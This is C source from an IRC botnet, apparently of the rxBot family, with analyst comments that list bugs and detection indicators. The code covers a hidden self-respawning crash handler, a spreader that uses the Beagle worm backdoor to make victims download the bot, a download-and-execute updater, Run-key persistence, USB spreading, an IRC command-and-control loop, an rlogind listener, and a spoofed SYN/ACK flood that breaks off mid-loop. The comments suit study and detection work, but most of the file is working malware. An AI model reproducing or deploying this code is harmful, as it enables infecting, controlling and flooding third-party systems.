/*
 * SEH frame handler installed by the bot to survive crashes.
 *
 * Behaviour visible in this listing: on any exception reaching this frame it
 * closes the main socket, kills the worker threads, tears down Winsock,
 * relaunches its own executable (GetModuleFileName) hidden, with the System32
 * directory as CWD, unlinks its own EXCEPTION_REGISTRATION record with inline
 * x86 asm, then calls ExitProcess(0).  The EAX patch and the final
 * `return ExceptionContinueExecution` are dead code -- ExitProcess never
 * returns, so the faulting instruction is never resumed.
 *
 * Review / analyst notes (code intentionally left unchanged):
 *  - fWSACleanup() is called twice; redundant.
 *  - CreateProcess is called with bInheritHandles=TRUE, so any inheritable
 *    handles (sockets, files) leak into the respawned copy.
 *  - The asm assumes the registration record pointer is at [ESP] and pops
 *    8 bytes; this only holds for the 32-bit MSVC SEH frame layout the
 *    author targeted and cannot be validated from this excerpt.
 *  - `cdecl` (not `__cdecl`) and `scratch` are presumably a project macro and
 *    a global respectively -- neither is visible here.
 *
 * Detection angle: a process that, on fault, spawns its own image with
 * SW_HIDE | DETACHED_PROCESS from %SystemRoot%\system32 is a strong
 * self-restart / watchdog indicator.
 */
EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord,
	void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext)
{	

	// do some clean-up: drop the main IRC socket, stop every worker, and
	// shut Winsock down (the second fWSACleanup is redundant)
	fclosesocket(threads[0].sock);
	killthreadall();
	fWSACleanup();
	fWSACleanup();
	Sleep(100);
	
	// respawn ourselves hidden (window only shown when DEBUG_CONSOLE is set)
	PROCESS_INFORMATION pinfo;
	STARTUPINFO sinfo;
	memset(&pinfo, 0, sizeof(pinfo));
	memset(&sinfo, 0, sizeof(sinfo));
	sinfo.lpTitle = "";
	sinfo.cb = sizeof(sinfo);
	sinfo.dwFlags = STARTF_USESHOWWINDOW;
	#ifdef DEBUG_CONSOLE
	sinfo.wShowWindow = SW_SHOW;
	#else
	sinfo.wShowWindow = SW_HIDE;
	#endif
		
	// botfile = path of the running image; sysdir = CWD for the new copy
	char botfile[MAX_PATH],sysdir[MAX_PATH];
	GetSystemDirectory(sysdir, sizeof(sysdir));
	GetModuleFileName(NULL, botfile, sizeof(botfile));

	// bInheritHandles=TRUE: the child inherits our inheritable handles
	if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
		Sleep(100);
		CloseHandle(pinfo.hProcess);
		CloseHandle(pinfo.hThread);
	}

	// Change EAX in the context record so that it points to someplace
	// where we can successfully write
	// (has no effect in practice: ExitProcess below never returns, so the
	// context is never resumed)
	ContextRecord->Eax = (DWORD)&scratch;

	_asm
	{                           // Remove our EXECEPTION_REGISTRATION record
		mov     eax,[ESP]       // Get pointer to previous record
		mov     FS:[0], EAX     // Install previous record
		add     esp, 8          // Clean our EXECEPTION_REGISTRATION off stack
	}

	// terminate this (crashed) instance; the respawned copy carries on
	ExitProcess(0);

	// Tell the OS to restart the faulting instruction
	// (unreachable -- see note above)
	return ExceptionContinueExecution;
}
/*
 * Spreader routine: talks to a listener on exinfo.ip:exinfo.port, sends one
 * of two fixed "auth" blobs (BeagleAuth1 / BeagleAuth2, selected by the IRC
 * command "beagle1" vs anything else), reads 8 bytes back, and then sends a
 * URL of the form http://<GetIP(sSock)>:<httpport>/<own exe name> -- i.e. it
 * points the remote end at this bot's own HTTP server to fetch a copy of
 * the bot binary.  The naming suggests it abuses the backdoor left by the
 * Bagle/Beagle mail worm; that is an inference from names, not visible here.
 *
 * Parameters: exinfo -- project EXINFO struct (ip, port, command, sock,
 *             chan, notice, silent, exploit index).
 * Returns:    TRUE if the URL send "succeeded" (see caveat below).
 *
 * Review notes (code intentionally left unchanged):
 *  - `sizeof(BeagleAuth)` is the size of a char pointer, not the length of
 *    the auth string, so only pointer-size bytes of the blob are sent.
 *  - `sizeof(buffer)` sends the whole IRCLINE buffer including whatever
 *    lies past the NUL terminator (stack contents leak to the peer).
 *  - `if(fsend(...))` treats SOCKET_ERROR (-1, nonzero) as success, and
 *    frecv() returning 0 (peer closed) also counts as success.
 *  - fclosesocket() is called even when fsocket() returned INVALID_SOCKET.
 *  - No timeout on connect/recv: the thread can block indefinitely.
 */
BOOL Beagle(EXINFO exinfo)
{
	char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];

	BOOL success = FALSE;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) 
		return FALSE; 

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
		ssin.sin_port = fhtons(exinfo.port);

		if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			// pick the auth blob by command name; both are globals not shown here
			BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
			// NOTE: sizeof(BeagleAuth) == sizeof(char *), not the blob length
			if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
				// expects an 8-byte reply; 0 bytes (closed) is not rejected
				if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
					// build "<name><ext>" of our own image, then the download URL
					GetModuleFileName(0, botfile, sizeof(botfile));
					_splitpath(botfile, NULL, NULL, fname, ext);
					_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
					_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);

					// sends the full IRCLINE buffer, not just the string;
					// a -1 (SOCKET_ERROR) return also passes this test
					if(fsend(sSock, buffer, sizeof(buffer), 0)) 
						success = TRUE;
				}
			}
		}
	}

	fclosesocket(sSock);
	fWSACleanup();

	// report back over IRC (unless silent) and bump the per-exploit counter
	if (success) {
		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;
	}

	return (success);
}
/*
 * Download-and-execute / self-update thread (variant with XOR payload
 * obfuscation and CRC32 check).  Parameters arrive as a DOWNLOAD struct
 * through `param`; the struct is copied locally and `gotinfo` is set so the
 * spawning thread can reuse its buffer.
 *
 * Flow: fInternetOpenUrl(dl.url) -> CreateFile(dl.dest) -> stream the body
 * in IRCLINE-sized chunks (optionally XOR-decoding with Xorbuff) -> optional
 * size check (dl.filelen) and CRC32 check (dl.expectedcrc, computed over the
 * written file by crc32f) -> either ShellExecute the file (dl.run) or, for an
 * update (dl.update == 1), CreateProcess it, uninstall() and ExitProcess.
 *
 * Security notes for the analyst: there is no authenticity check of the
 * downloaded file -- CRC32 is not a MAC and the size/CRC values come from
 * the same channel as the URL, so anyone who can inject the command can run
 * arbitrary code.  Xorbuff is obfuscation, not confidentiality.
 *
 * Review notes (code intentionally left unchanged):
 *  - `f < (HANDLE)1` does not catch INVALID_HANDLE_VALUE ((HANDLE)-1), so a
 *    failed CreateFile is not detected and WriteFile is called on it.
 *  - On the "couldn't open file" path `fh` is never closed (handle leak).
 *  - fInternetReadFile's return is ignored; on failure `r` keeps whatever
 *    it held before (uninitialized on the first pass).
 *  - malloc(512000) is unchecked; fileTotBuff is written but never read
 *    (the code that used it is commented out), so it is dead work.
 *  - sprintf into threads[].name with dl.url: the name field size is not
 *    visible here, so this may overflow on long URLs -- verify.
 */
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	// copy the request and release the caller's struct
	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = TRUE;

	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		// (NOTE: INVALID_HANDLE_VALUE is (HANDLE)-1 and is NOT < 1, so this
		// check misses the actual CreateFile failure value)
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			// fh is leaked on this path
			ExitThread(0);;
		}

		total = 0;
		start = GetTickCount();

		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			// return value unchecked; r is stale if this fails
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			if (dl.encrypted)
				Xorbuff(buffer,r);	// XOR de-obfuscation of the payload
			WriteFile(f, buffer, r, &d, NULL);
			
			// keep the first 500 KB in memory (unused -- see CRC block below)
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			// progress is exposed through the thread-list name
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		BOOL goodfile=TRUE;

		// optional exact-size check supplied with the command
		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=FALSE;
				sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=FALSE;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		// CRC32 over the file on disk -- an integrity hint, not authentication
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=FALSE;
				sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		// a bad file is left on disk; only the execute step is skipped
		if (goodfile==FALSE) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// dl.run: launch the downloaded file via the shell (visible window)
			if (dl.run == 1) {
				fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// start the new binary hidden, then remove ourselves and exit
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			memset(&pinfo, 0, sizeof(pinfo));
			memset(&sinfo, 0, sizeof(sinfo));
			sinfo.lpTitle = "";
			sinfo.cb = sizeof(sinfo);
			sinfo.dwFlags = STARTF_USESHOWWINDOW;
			sinfo.wShowWindow = SW_HIDE;

			if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

	badfile:
	// reached with fh == NULL on the "bad URL" path; the close is a no-op then
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(0);
}
/*
 * Bot entry point (console build).  The `#endif` directly under the
 * signature closes a preprocessor conditional that begins before this
 * excerpt -- presumably selecting between main() and WinMain(); not visible.
 *
 * Flow: LoadDLLs() resolves the f*-prefixed API pointers -> environment
 * check on MessageBoxA's prologue -> copy self to %gotopth%\exename
 * (MoveBot) -> HKLM Run-key persistence -> relaunch the copy hidden and
 * exit -> otherwise run as a service (fStartServiceCtrlDispatcher) or, in
 * NO_SERVICE builds, start the USB spreader and the main bot thread.
 *
 * Indicators for detection/IR:
 *  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<szRegname> = exename
 *  - a copy of the binary at <expanded gotopth>\<exename>
 *  - a hidden child process started with DETACHED_PROCESS from that path
 *
 * Review notes (code intentionally left unchanged):
 *  - The 5-byte compare against MessageBoxA is presumably a check for a
 *    hooked / instrumented user32 (or a specific OS build); if LoadLibrary
 *    fails, GetProcAddress(NULL,..) yields 0 and memcmp reads address 0.
 *  - RegCreateKeyEx's result is ignored; on failure hndKey stays NULL and
 *    RegSetValueEx/RegCloseKey are called on it.
 *  - RegSetValueEx is given strlen(exename) bytes, i.e. without the NUL
 *    terminator that REG_SZ data is expected to include.
 *  - `msg` is unused.
 */
int main(int argc, char *argv[])
#endif

{
char msg[256];
   LoadDLLs();

	// compare the first 5 bytes of MessageBoxA's code against a fixed
	// pattern and bail out on a match -- purpose not stated in the source
	unsigned char szBytes[] = { 0xc8, 0x0, 0x4, 0x0, 0x60 }; 
    DWORD dwAddr = (DWORD)GetProcAddress(LoadLibrary("user32.dll"), "MessageBoxA"); 

    if(!memcmp((LPVOID)dwAddr, (LPVOID)szBytes, sizeof(szBytes))) 
    { 
        ExitProcess(0); 
    }

#ifndef NO_SERVICE
	SERVICE_TABLE_ENTRY servicetable[] =
	{
		{servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
		{NULL, NULL}
	};
#endif

	// cpbot = our current path; spath = install location <gotopth>\exename
	char cpbot[MAX_PATH];
	char movetopath[MAX_PATH];
	char spath[MAX_PATH];
	GetModuleFileName(GetModuleHandle(NULL), cpbot, sizeof(cpbot));
	ExpandEnvironmentStrings(gotopth,movetopath,sizeof(movetopath));
	sprintf(spath,"%s\\%s",movetopath,exename);
	
#ifndef _DEBUG
	// install step: only taken when the copy to the install dir succeeded
	if (MoveBot(movetopath,exename))
	{

    // persistence via the HKLM Run key; return values unchecked
    HKEY hndKey = NULL;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
	RegSetValueEx(hndKey,szRegname,0, REG_SZ,(const unsigned char *)exename,strlen(exename));
	RegCloseKey(hndKey);
		// hand over to the installed copy and exit this instance
		PROCESS_INFORMATION pinfo;
		STARTUPINFO sinfo;
		ZeroMemory(&pinfo,sizeof(pinfo));
		ZeroMemory(&sinfo,sizeof(sinfo));
		sinfo.lpTitle     = "";
		sinfo.cb = sizeof(sinfo);
		sinfo.dwFlags = STARTF_USESHOWWINDOW;
		sinfo.wShowWindow = SW_HIDE;

		if (CreateProcess(spath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo))
		{
			Sleep(200);
			CloseHandle(pinfo.hProcess);
			CloseHandle(pinfo.hThread);
			fWSACleanup();
			ExitProcess(EXIT_SUCCESS);
		}

		ExitProcess(1);
	}
#endif // _DEBUG


#ifndef NO_SERVICE
	// run under the SCM; if the dispatcher refuses (not started as a
	// service), register ourselves as one instead
	if(fStartServiceCtrlDispatcher(servicetable) == 0)
		InstallService(spath);
#else

	// non-service build: kick off USB spreading, then block on the bot thread
	DWORD id;
	NTHREAD usb;
	usb.conn = &mainirc;
	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)USB_Spreader, &usb, 0, &id); // Execute USB spread on install.
	HANDLE threadhandle;
	if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Bthd, NULL, 0, &id)) == 0) 
		return 0;

	WaitForSingleObject(threadhandle, INFINITE);
	CloseHandle(threadhandle);
	return 0;
#endif // NO_SERVICE
#ifdef _DEBUG
#endif
	return 0;
}
/*
 * Main bot thread: single-instance guard, Winsock init, local IP lookup,
 * then an endless reconnect loop over the configured IRC servers
 * (sinfo[curserver].host/port/pass) with randomly generated nick, ident
 * and realname.  `param` is unused.
 *
 * Review notes (code intentionally left unchanged):
 *  - The first loop retries CreateMutex up to 6 times when it returns NULL
 *    (an error, not "already exists"); ERROR_ALREADY_EXISTS is not checked.
 *  - The second CreateMutex (bInitialOwner=TRUE) is the real guard: a 30 s
 *    wait that times out means another instance owns it -> ExitProcess.
 *    That handle is never closed, and ReleaseMutex(xetum) at the end
 *    releases the first handle, which this thread never acquired.
 *  - fgethostbyname() may return NULL; `h->h_addr_list[0]` is dereferenced
 *    without a check.
 *  - strncpy(inip, ip, sizeof(inip)) does not guarantee NUL termination.
 *  - srand(GetTickCount()) makes the nick generator predictable.
 *  - `return TRUE` after ExitThread is unreachable.
 */
DWORD WINAPI Bthd(LPVOID param)
{
	// retry mutex creation on failure (NULL), 5 s apart, at most 6 times
	for (int m=0;m<6;m++)
	{
		if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
				Sleep(5000);
		else
			break;
	}
	// single-instance check: if we cannot own the named mutex within 30 s,
	// another copy is running
	if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
		ExitProcess(0);

	addthread(MAIN_THREAD,str_main_thread,main_title);
	srand(GetTickCount());
	dwstarted=GetTickCount();
	WSADATA wsadata;
	if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
		ExitProcess(-2);


	// record the first address of our own hostname in the global inip
	int i=0;
	DWORD id=0;
	char *ip;
	char hostname[256];
	struct hostent *h;
	fgethostname(hostname, 256);
	h = fgethostbyname(hostname);	// NULL on failure -- unchecked below
	ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
	strncpy(inip,ip,sizeof(inip));


	curserver=0;
	HookProtocol(&mainirc);
	
	// C2 loop: rotate through the server list until told to stop
	while (mainirc.should_connect()) {
		if (!mainirc.is_connected())
		{
#ifdef _DEBUG
			printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
			FlushDNSCache();
#endif
			mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
					  mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
					  mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
			mainirc.message_loop();
		}
		else
			mainirc.message_loop();

		Sleep(SFLOOD_DELAY);
		
		// advance to the next server, wrapping at srvsz
		if (curserver==(srvsz-1))
			curserver=0;
		else
			curserver++;
	}

	// cleanup;
	//killthreadall();
	fWSACleanup();
	ReleaseMutex(xetum);
	ExitThread(0);

		return TRUE;
}
/*
 * Listener thread for the bot's "rlogind" service: binds TCP port
 * rlogind.port on INADDR_ANY (every interface) and spawns a
 * RlogindClientThread per accepted connection.  What the client thread does
 * (authentication, shell) is not in this excerpt.  `param` is an RLOGIND
 * struct; it is copied locally and `gotinfo` set so the caller can reuse it.
 *
 * Indicators: a new listening TCP socket on all interfaces plus the log
 * line "[RLOGIND]: Ready and waiting for incoming connections."
 *
 * Review notes (code intentionally left unchanged):
 *  - fsetsockopt(..., (char *)&flag, flag) passes the VALUE of flag (1) as
 *    optlen instead of sizeof(flag); if that fails, the accepted csock is
 *    dropped without ever being closed (socket leak per connection).
 *  - `csock` is uninitialized if the loop never ran (socket/bind/listen
 *    failed), yet fclosesocket(csock) is executed unconditionally.
 *  - The address of the local `rlogind` copy is handed to each client
 *    thread; the spin-wait on rlogind.gotinfo is what keeps that from
 *    racing the next accept().
 *  - An accept() failure or thread-creation failure ends the listener with
 *    a generic "server failed" message.
 */
DWORD WINAPI RlogindThread(LPVOID param)
{
	RLOGIND rlogind = *((RLOGIND *)param);
	RLOGIND *rloginds = (RLOGIND *)param;
	rloginds->gotinfo = TRUE;

	char sendbuf[IRCLINE];

	int csin_len, Err;
	unsigned long mode = 1;	// unused

	WSADATA WSAData;
	SECURITY_ATTRIBUTES SecurityAttributes;
	DWORD id;

	if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) {
		addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err);
		clearthread(rlogind.threadnum);
		ExitThread(1);
	}    
	// console Ctrl handler (CtrlHandler defined elsewhere)
	if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) {
		addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError());
		fWSACleanup();
		clearthread(rlogind.threadnum);
		ExitThread(1);
	}

	// listen on every interface, port taken from the IRC command
	SOCKET ssock, csock;
	SOCKADDR_IN csin, ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(rlogind.port);
	ssin.sin_addr.s_addr = INADDR_ANY;	

	if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		threads[rlogind.threadnum].sock = ssock;	// lets killthread close us
		if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
			if (flisten(ssock, SOMAXCONN) == 0) {
				SecurityAttributes.nLength = sizeof(SecurityAttributes);
				SecurityAttributes.lpSecurityDescriptor = NULL;
				SecurityAttributes.bInheritHandle = FALSE;

				addlog("[RLOGIND]: Ready and waiting for incoming connections.");

				BOOL flag = TRUE;
				while (1) {
					csin_len = sizeof(csin);
					if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)
						break;

					// NOTE: last argument should be sizeof(flag); on failure
					// csock is neither served nor closed
					if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) {
						rlogind.gotinfo = FALSE;
						sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum);
						addlog(sendbuf);
						// one client thread per connection, parented to this listener
						rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock);
						threads[rlogind.cthreadnum].parent = rlogind.threadnum;
						if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) {
							// wait until the client thread has copied `rlogind`
							while (rlogind.gotinfo == FALSE) 
								Sleep(50);
						} else {
							addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError());
							break;
						}
					}
				}
			}
		}
	}

	// any exit from the nest above is reported as a server failure
	sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError());
	if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice);
	addlog(sendbuf);
	
	// csock may be uninitialized here (see header note)
	fclosesocket(csock);
	fclosesocket(ssock);
	fWSACleanup();

	clearthread(rlogind.threadnum);

	ExitThread(0);
}
/*
 * Raw-socket TCP flood (attack tooling -- documented for analysis only, not
 * improved).  Builds IP+TCP headers by hand (IP_HDRINCL), spoofs the source
 * address by incrementing SpoofingIP on every packet, randomises the source
 * port within 1000..2000, and sends to TargetIP:TargetPort until `len`
 * seconds (QueryPerformanceCounter) have elapsed.
 *
 * Type selects the flags: "ddos.syn" -> SYN, "ddos.ack" -> ACK,
 * "ddos.random" -> SYN or ACK per packet with ack_seq in 0..2.
 *
 * Returns: total bytes handed to sendto, 0 on any setup or send error
 * (FALSE is 0, so callers cannot distinguish "failed" from "sent nothing").
 *
 * Review notes (code intentionally left unchanged):
 *  - For any other Type string, tcpHeader.flags and ack_seq are never
 *    assigned and contain stack garbage.
 *  - addr_in is not zeroed (sin_zero uninitialized); SendSyn below does
 *    memset its copy.
 *  - tcpHeader.seq is built with fhtons() of a 16-bit truncation, so the
 *    sequence number never uses its upper 16 bits.
 *  - IPHEADER/TCPHEADER/PSDHEADER and checksum() are project types/helpers
 *    not shown here; the pseudo-header + TCP checksum is computed first,
 *    then the IP checksum over IP+TCP.
 *  - Raw sockets with IP_HDRINCL need administrative rights, and newer
 *    Windows versions refuse TCP payloads on raw sockets, so on such hosts
 *    this presumably fails at the first sendto -- verify per OS.
 */
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{ 
	WSADATA WSAData; 
	SOCKET sock; 
	SOCKADDR_IN addr_in; 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) 
		return FALSE; 
 
	// raw socket; we supply the IP header ourselves (IP_HDRINCL below)
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE;
	}

	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	// destination; struct not zeroed (sin_zero left uninitialized)
	addr_in.sin_family=AF_INET;
	addr_in.sin_port=fhtons((unsigned short)TargetPort);
	addr_in.sin_addr.s_addr=TargetIP;

	// fixed IP header fields: v4, IHL from struct size, TTL 128, proto TCP
	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
	ipHeader.ident=1;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	// initial TCP values; sport and seq are overwritten per packet in the loop
	tcpHeader.dport=fhtons((unsigned short)TargetPort);
	tcpHeader.sport=fhtons((unsigned short)rand()%1025);
	tcpHeader.seq=fhtonl(0x12345678);

	/* A SYN attack simply smash its target up with TCP SYN packets. 
	Each SYN packet needs a SYN-ACK response and forces the server to wait for 
	the good ACK in reply. Of course, we just never gives the ACK, since we use a 
	bad IP address (spoof) there's no chance of an ACK returning. 
	This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. 
	When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, 
	and that's the end of that server until the attack is cleared up.*/

	// flag selection; no default -> garbage flags for an unknown Type
	if (strcmp(Type,"ddos.syn") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=SYN;
	} else if (strcmp(Type,"ddos.ack") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=ACK;
	} else if (strcmp(Type,"ddos.random") == 0) {
		tcpHeader.ack_seq=rand()%3;
		if (rand()%2 == 0) 
			tcpHeader.flags=SYN;
		else 
			tcpHeader.flags=ACK;
	}
	
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	// run for `len` seconds of wall clock
	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while(TRUE) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));	// 16-bit truncated

		// spoofed source: a new address every packet
		ipHeader.sourceIP=fhtonl(SpoofingIP++); 

		// TCP checksum over pseudo-header + TCP header
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
